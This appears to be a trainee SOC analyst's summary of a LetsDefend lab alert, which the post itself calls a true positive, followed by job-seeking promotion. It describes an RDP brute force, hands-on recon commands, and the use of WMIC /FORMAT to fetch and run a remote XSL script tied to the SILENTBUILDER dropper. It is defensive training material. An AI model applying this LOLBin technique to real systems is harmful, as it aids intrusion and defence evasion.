XSL Script via WMIC.EXE — RDP Brute Force, LOLBin Execution & SILENTBUILDER | LetsDefend SOC310
Day 114 of Becoming a SOC Analyst — SOC310 XSL Script Execution Via WMIC.EXE (True Positive)
RDP brute force from 146.70.246.119 (confirmed malicious via AbuseIPDB) succeeded against user letsdefend on host Ambrosine (172.16.17.113), followed by hands-on-keyboard recon — arp -a, netstat -an, net localgroup administrators, whoami, runas powershell. The attacker then used WMIC /FORMAT to fetch and execute a remote XSL script over HTTP — a classic T1220 LOLBin technique to bypass defenses — with the payload URL flagged malicious and attributed to SILENTBUILDER, a dropper/downloader associated with a Conti subgroup. Device action was Allowed at execution time — no additional outbound connections observed, endpoint contained.
🔬 Analysis Reports
🔍 AbuseIPDB (146.70.246.119) → https://www.abuseipdb.com/check/146.7...
🦠 VirusTotal (wmicscript.xsl URL) → https://www.virustotal.com/gui/url/c1...
Scenario sourced from LetsDefend.io — one of the best hands-on SOC analyst training platforms out there.
Highly recommend if you're on the same path. I'm documenting every day of my journey to landing a Level 1 SOC Analyst role — the wins, the grinds, and everything in between.
🔵 What I Cover
Threat Detection · Alert Triage · SIEM Analysis · Log Analysis · Incident Response · Blue Team Tools
🚨 Open to Work — Seeking a Level 1 SOC Analyst role in Melbourne or Remote (AU)
📂 Portfolio → inksec.io
💼 LinkedIn → linkedin.com/in/tate-pannam-8b64b23a3
If you chose the red pill... 0x74617465.sh
#SOCAnalyst #BlueTeam #Cybersecurity #WMIC #LOLBins #XSLScript #RDPBruteForce #Conti #SILENTBUILDER #DefenseEvasion #IncidentResponse #SIEM #Day114 #CyberSecurityJourney #Melbourne #LetsDefend #LetsDefendSOC #ThreatHunting #InfoSec #BlueTeamSecurity